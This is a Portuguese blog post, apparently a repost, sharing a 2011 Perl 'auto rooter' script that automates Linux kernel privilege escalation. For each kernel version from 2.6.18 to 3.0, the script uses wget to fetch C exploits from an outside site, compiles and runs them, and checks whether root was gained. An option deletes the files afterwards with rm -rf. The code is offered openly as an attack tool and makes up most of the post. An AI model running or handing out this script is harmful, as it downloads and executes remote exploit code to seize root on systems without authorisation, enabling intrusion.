2011 Linux Auto Rooter Beta 1.0 Coded by CrosS

2011 Linux Auto Rooter Beta 1.0 Coded by CrosS

Este script em perl faz download de alguns exploits em C, compilando com GCC, na tentativa de verificar se há 
Escalada de Privilégios no Kernel do Linux (Kernels 2.6.18, 2.6.33, 2.6.34, 2.6.37-rc2, 2.6.37, 2.6.43.2, 3.0)

Na verdade só está automatizando o processo de testes de cada exploit feito em C, o que poderia ter sido a 
compilação e testes manualmente.




#!/usr/bin/perl
#Coded By CrosS ( 2011 Linux Auto r00t3r )
print "###########################################################\n";
print "#             (Beta 1.0 )   Auto rooter by CrosS           #\n";
print "#  Usage :                                                 #\n";
print "#    perl $0 root    => To root            #\n";
print "#    perl $0 del     => Delete Exploit     #\n";
print "#                                                          #\n";
print "#       as R00TW0RM - Private Community is back            #\n";
print "#                  so Releasing 2011 auto rooter =)        #\n";
print "#   in case of error mailto: mr.0x0day[AT]live.com         #\n";
print "#                                                          #\n";
print "#        Thanks to: r0073r and L0rd CrusAd3r               #\n";
print "#              http://www.r00tw0rm.com/forum               #\n";
print "###########################################################\n\n\n";

if ($ARGV[0] =~ "root" )
{
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");

este script foi desenvolvido pelo CrosS para explorar algumas vulnerabilidades 
de algumas versões de kernel do Linux para ter uma escalada 
de privilégios e se tornar ROOT.

@firebitsbr

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s